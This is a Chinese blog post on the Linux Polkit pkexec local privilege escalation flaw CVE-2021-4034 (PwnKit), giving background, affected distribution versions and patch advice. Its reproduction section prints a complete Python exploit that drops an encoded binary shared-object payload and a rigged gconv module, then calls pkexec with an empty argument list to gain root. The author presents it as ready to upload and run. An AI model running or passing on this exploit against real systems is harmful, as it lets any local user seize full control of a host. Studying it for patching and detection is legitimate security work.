Linux Polkit权限提升漏洞(CVE-2021-4034)

最新推荐文章于 2024-04-14 16:13:19 发布
最新推荐文章于 2024-04-14 16:13:19 发布
阅读量1.1k 收藏
点赞数
分类专栏: 安全 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45780190/article/details/122718741
版权

Pkexec介绍:

Pkexec是类似sudo-like的权限管理软件,它的作用为允许授权用户以其它用户的身份去执行程序,如果未指定用户名,则程序将以超级管理员(root)的身份执行

漏洞描述

Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。

漏洞细节:

在这里插入图片描述
对pkexec的工作流程进行分析:
在源码的435行,pkexec的main()函数开始处理命令行的参数,并且在PATH环境的目录中搜索要执行的程序,在上述代码中它会在变量的目录中寻找要执行的程序。

但是如果命令行的参数为0,会导致pkexec无法正常处理参数,导致它将环境变量作为命令去执行,可以使低权限普通用户使用root权限去执行程序,达到提权的目的。

更详细细节可以参考以下文章
https://mp.weixin.qq.com/s/AFBYKS-LIXSOLUVWBI_oAQ

漏洞复现:

#!/usr/bin/env python3

# poc for https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt found by qualys
# hardcoded amd64 lib
from ctypes import *
from ctypes.util import find_library
import os
import zlib
import base64
import tempfile

payload = zlib.decompress(
    base64.b64decode(
        """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"""
    )
)
libc = CDLL(find_library("c"))
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
libc.execve.restype = c_ssize_t

wd = tempfile.mkdtemp()
open(wd + "/pwn.so", "wb").write(payload)
os.mkdir(wd + "/gconv/")
open(wd + "/gconv/gconv-modules", "w").write(
    "module  UTF-8//    INTERNAL    ../pwn    2"
)
os.mkdir(wd + "/GCONV_PATH=.")
os.mknod(wd + "/GCONV_PATH=./gconv")
os.chmod(wd + "/GCONV_PATH=.", 0o777)
os.chmod(wd + "/GCONV_PATH=./gconv", 0o777)
os.chmod(wd + "/pwn.so", 0o777)
os.chdir(wd)
cmd = b"/usr/bin/pkexec"
argv = []
envp = [
    b"gconv",
    b"PATH=GCONV_PATH=.",
    b"LC_MESSAGES=en_US.UTF-8",
    b"XAUTHORITY=../gconv",
    b"",
]

cargv = (c_char_p * (len(argv) + 1))(*argv, None)
cenv = (c_char_p * (len(envp) + 1))(*envp, None)
libc.execve(cmd, cargv, cenv)

目前网上已经有c与python版本的exp。我选择的是python版本。exp运行需要python3的环境。
在这里插入图片描述
该漏洞利用比较简单,只需上传exp脚本即可成功提权。但是需要已获得普通权限的攻击者可通过此漏洞获取root权限。

该漏洞CVSS评分:7.8,危害等级:高危

影响版本:

以下为部分linux系统版本官方提示:

1.Redhat部分受影响版本:
在这里插入图片描述
更多可以参考:https://access.redhat.com/security/cve/CVE-2021-4034

2.Ubuntu受影响版本:
在这里插入图片描述
https://ubuntu.com/security/CVE-2021-4034

3.Debian受影响版本如下:
在这里插入图片描述
https://security-tracker.debian.org/tracker/CVE-2021-4034

由于 polkit 为系统预装工具,目前主流Linux版本均受影响。

修复方式:

1.可在linux发行版系统相应的包管理器或者官方网站上去更新polkit程序包。
2.如若您所使用的系统并未发布更新补丁,可以考虑给pkexec进行降权处理。

kb2414
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf通防waf
weixin_60777183的博客
11-07 764
<?php /**CTF—**/ error_reporting(0); class CTF_WAF{ public $getfilter; public $postfilter; public $cookiefilter; public $orther; public $url; public $dir; public $ip; public $Waf_switch;
Linux Polkit 权限提升漏洞CVE-2021-4034)在 CentOS 6 系统上修复升级的 rpm 离线包
02-07
CVE-2021-4034,通常被称为“PwnKit”漏洞,是一个本地权限提升漏洞,存在于Polkitpkexec组件中。该漏洞源于一个未初始化的内存区域,当恶意用户以非特权用户身份运行特定的Polkit进程时,可以利用此漏洞执行任意...
AWD:赛前准备工作以及深度脚本讲解
薯片薯条的博客
11-10 9955
有幸被邀请代表学校去参加线下攻防,也就是俗称的AWD比赛。 当然,在这一方面我也只能算是小白,所以希望各位大佬在看完我写的博客以后能指正一些错误。 一.比赛介绍 AWD赛制是按照分组来进行比赛的。每组3-4人,经过不同的分工,从而实现对服务器的维护以及对其他人的服务器进行攻击。 每个服务器都会有一个提前放好的有漏洞的网站,需要进行代码审计,然后修补漏洞。 举个例子,某些参数一可以参杂系统的cmd命令上来,如果执行成功,就会获取你服务器上某个文件夹下的flag.txt的内容,一旦获取成功,就代表被攻破。 .
secureCRT - WR脚本
06-22
主要实现secureCRT(7.2.4)中以下2种命令中的数据与代码分离,并使数据可共享。 crt.Screen.WaitForString <……> crt.Screen.Send <……>
浅谈AWD攻防赛的生存攻略
鹿鸣天涯
09-28 4971
AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。
AWD:WebFuzzer 序列快速构建脚本
YakProject的博客
09-25 111
新发布的 Web Fuzzer 序列 (Web Fuzzer Sequence),使用 Fuzzer 序列可以轻松构建一整个测试工作流。这一回我们将综合利用 Yakit 现有的功能串联起 CSRF token 获取,flag 获取到提交 flag 这几个工作,最终快速构建起一个一键收割 flag 的 AWD 脚本。在开始之前,先介绍一下测试环境。这是一个AWD靶场,平台在。
CVE-2021-4034 polkit本地权限提升[pkexec权限问题]
01-27
polkitpkexec 中发现的一个权限提升漏洞CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux 发行版的默认配置中。 CentOS 7 polkit-0.112-26.el7_9.1.x86_64 不受影响。
Linux Polkit 权限提升漏洞CVE-2021-4034)CentOS 7和Centos 6修复升级的 rpm 离线包
02-08
然而,2021年发现了一个名为CVE-2021-4034的重大漏洞,该漏洞允许任何本地攻击者无须认证即可获取系统管理员权限,对系统的安全性构成严重威胁。 **漏洞详解:** CVE-2021-4034,也被称为"Polkit Local Privilege ...
Linux Polkit 权限提升漏洞CVE-2021-4034)在 CentOS/RHEL 6 修复升级的 rpm 离线包
02-09
然而,2021年,一个名为CVE-2021-4034的重大漏洞被发现,该漏洞允许本地攻击者通过利用Polkit中的一个未授权的命令执行路径来获取root权限,无需任何认证。这个漏洞影响了包括CentOS和RHEL 6在内的多个Linux发行版,...
awd比赛用到的脚本.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。
Linux Polkit pkexec权限提升漏洞(CVE-2021-4034) centos系统polkit漏洞修复
weixin_45618691的博客
10-10 2695
polkit漏洞修复
AWD攻防比赛指导手册
瓦罗兰特顶级C位的博客
01-04 2386
「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一,该模式常见于线下赛。
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1061
ctf awd知识分享(常用命令,不死马,waf,文件监控)
polkit pkexec 本地提权漏洞
sre救赎之路
05-04 937
2022年1月25日。
内网渗透-Linux内网渗透
最新发布
lza20001103的博客
04-14 1628
内网渗透-Linux内网渗透
CTF——AWD模式小总结
热门推荐
weixin_46079186的博客
11-04 1万+
本文以bugku平台awd比赛来写 awd 比赛平台 一、防御(比赛开始有30分钟防御时间) 比赛开始得到一个 靶机,如下信息ssh 用户名和密码,还有虚拟ip 然后我们ssh 连接进行防御,这里我推荐使用Xshell配合Xftp使用,打开xshell 新建一个连接,写入相应信息 填入用户名还有密码,然后点击连接 2. 进入之后我们直接点击,xftp按钮(目的: 需要连接xftp下载文件) 连接成功后如下 进入/var/www将html文件下载下来 (目的是扫描是否存在后门,还有代码审计
CTF-线下AWD-py脚本
1cePeak
11-08 1482
文件监控脚本  # -*- coding: utf-8 -*- #use: python file_check.py ./ import os import hashlib import shutil import ntpath import time CWD = os.getcwd() FILE_MD5_DICT = {} # 文件MD5字典 ORIGIN_FILE_LIS...
ctf线下AWD攻防赛学习笔记
普通Gopher
10-20 1万+
ctf线下AWD攻防赛学习笔记 CTF线下攻防赛主要以攻防模式(Attack & Defense)来呈现。一般在这种模式下,一支参赛队伍有三名队员,所有的参赛队伍都会有同样的初始环境,包含若干台服务器。参赛队伍挖掘漏洞,通过攻击对手的服务器获取Flag来得分,以修补自身服务器的漏洞防止扣分。 在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。 题目类型 语...
linux polkit权限提升漏洞
03-16
Linux polkit权限提升漏洞是指在Linux系统中,由于polkit(PolicyKit)授权机制的缺陷,攻击者可以利用漏洞提升权限,执行恶意操作。这种漏洞可能会导致系统被攻击者完全控制,造成严重的安全问题。为了避免这种漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值